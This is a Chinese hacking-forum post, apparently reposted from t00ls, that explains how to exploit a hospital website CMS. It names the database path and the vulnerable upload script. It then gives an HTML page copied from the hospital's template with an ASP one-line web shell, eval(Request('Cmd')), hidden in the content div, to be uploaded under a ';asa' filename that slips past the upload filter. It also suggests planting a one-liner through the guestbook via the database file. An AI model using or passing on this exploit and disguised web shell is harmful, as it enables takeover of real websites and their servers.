转自:http://t00ls.net/thread-20291-1-1.html

好像有2个版本一个是asp的一个是php的

数据库路径  db/sywl.asp

漏洞文件 up2.asp 内容太大了...也没什么好解的

将以下代码存为  ;asa 直接上传 得到路径-_, (当然大牛们也可以自己构造一个一句话)

前面不要加,加了就会提示 不能上传ASA文件

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
 <meta name="keywords" content="a" />
 <meta name="description" content="a" />
 <title>a</title>
 <link href="/template/images/style.css" rel="stylesheet" type="text/css" />
 
<script type="text/javascript">var king_page='/page/';</script>
 <script src="/page/system/inc/jquery.js" type="text/javascript"></script>
 <script src="/page/system/inc/jquery.kc.js" type="text/javascript"></script>
 </head>
 <body>
 <!--顶部 -->
 <div id="top">
   <div><img src="/template/images/logo.jpg" /></div>
   <div id="menu">
     <ul>
       <li><a href="/">医院首页</a></li>
       <li><a href="/html/yygk/">医院概况</a></li>
       <li><a href="/html/jyzn/">就医指南</a></li>
       <li><a href="/html/ksjs/">科室介绍</a></li>
       <li><a href="/html/yywh/">医院文化</a></li>
       <li><a href="/html/news/">新闻资讯</a></li>
       <li><a href="/html/jkkp/">健康科普</a></li>
       <li><a href="/page/feedback/">请你留言</a></li>
     </ul>
   </div>
   <!--主菜单 -->
 </div>
 <!--内容 -->
 <div class="content" id="onepage"><%
 Dim ConKey:ConKey="Cmd"
 Dim InValue:InValue=Request(ConKey)
 eval(InValue)
 %></div>
 <!--底部 -->
 <div id="line"></div>
 <div id="bottom">
         京ICP备×××××××××号</div>
 <div id="Layer1">
   <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://..../pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="910" height="175">
     <param name="movie" value="/template/images/sqlogo.swf" />
     <param name="quality" value="high" />
     <param name="wmode" value="transparent">
     <embed src="/template/images/sqlogo.swf" quality="high" wmode="transparent" pluginspage="http://www.....com/go/getflashplayer" type="application/x-shockwave-flash" width="910" height="175"></embed>
   </object>
 </div>
 </body>
 </html>

更简单的如果数据库没改名

留言直接丢一句话。。连接数据库文件-_,

大牛别喷

好像这程序也出了一个编辑器,也是可以这样利用